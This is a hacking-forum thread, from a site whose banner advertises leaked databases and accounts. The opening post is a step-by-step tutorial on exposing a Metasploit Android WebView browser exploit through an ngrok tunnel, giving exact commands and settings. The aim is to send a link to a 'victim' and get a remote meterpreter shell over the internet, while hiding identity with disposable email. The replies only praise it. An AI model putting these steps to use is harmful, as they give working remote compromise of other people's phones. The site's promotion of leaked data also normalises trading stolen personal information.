Create an account

Very important

  • To access the important data of the forums, you must be active in each forum and especially in the leaks and database leaks section, send data and after sending the data and activity, data and important content will be opened and visible for you.
  • You will only see chat messages from people who are at or below your level.
  • More than 500,000 database leaks and millions of account leaks are waiting for you, so access and view with more activity.
  • Many important data are inactive and inaccessible for you, so open them with activity. (This will be done automatically)


Thread Rating:
  • 717 Vote(s) - 3.44 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Use Metasploit on WAN without Port Forwarding

#1
USE METASPLOIT ON WAN WITHOUT PORT FORWARDING

Setting Ngrok
  • First of all, we start with creating account at Ngrok.com
  • Use any disposable email service to sign up.
  • After signing up, log in to Ngrok.com and download the ngrok file.
  • Now extract the file and open terminal in that folder.
  • Log in again to your ngrok account and type the commands available on that page.
  • Copy the authentication code command and paste in the terminal.

Quote:./ngrok authtoken your_authentication_code
[Image: step0002.png]
  • With the above command, the authentication code will be saved in your computer.
  • Now type the following command to start the tunnel.

Quote:./ngrok http 4431
[Image: step0001.png]
  • Now the ngrok will start a tunnel to your computer. Copy the Ngrok URL we will need this URL later in this tutorial. Also remember the port in above command.

Using Metasploit with Ngrok
  • For this tutorial, we are using Android web view exploit.
  • Open terminal and type msfconsole.
  • Now type the following command to load Android web view exploit.

Quote:use exploit/android/browser/webview_addjavascriptinterface
[Image: Screenshot%2Bfrom%2B2017-06-02%2B23-04-57.png]
  • Now while setting SRVHOST and LHOST use localhost.

Quote:set srvhost localhost
set lhost localhost
  • In SRVPORT we will use same port that we have used while starting ngrok .i.e 4431.

Quote:set srvport 4431
  • Now set URIPATH to /. Use the following commands.

Quote:set uripath /
  • Above three steps are most important, so don't change the values.
  • Then enter run to start exploit.
  • Now you can send the link that you have got when you started Ngrok to the victim and you we be able to get the meterpreter session over the internet

Video Tutorials:






NOTE
  • Don't change the values of srvhost, lhost and uripath.
  • Make sure srvport and port you set while starting ngrok are same.
  • Only for educational purpose.
Reply

#2
It's great that you've added the Images, It makes It all the more easy to follow and understand.

A well documented HQ tut.
Good work.
EDIT: Typo.
Reply

#3
Thank you!
I needed this.
Reply

#4
Another very nice tutorial. Always love reading them, good documented and detailed. One of the few members that still posts valuable, good documented tutorials.
Reply

#5
Very nice tutorial you got there, good job my friend and thank you for sharing.
Reply

#6
posting so i can follow this thread
Reply

#7
This is very interesting. I have been needing something like this very much. Thanks!
Reply



Forum Jump:


Users browsing this thread:
1 Guest(s)

©0Day  2016 - 2023 | All Rights Reserved.  Made with    for the community. Connected through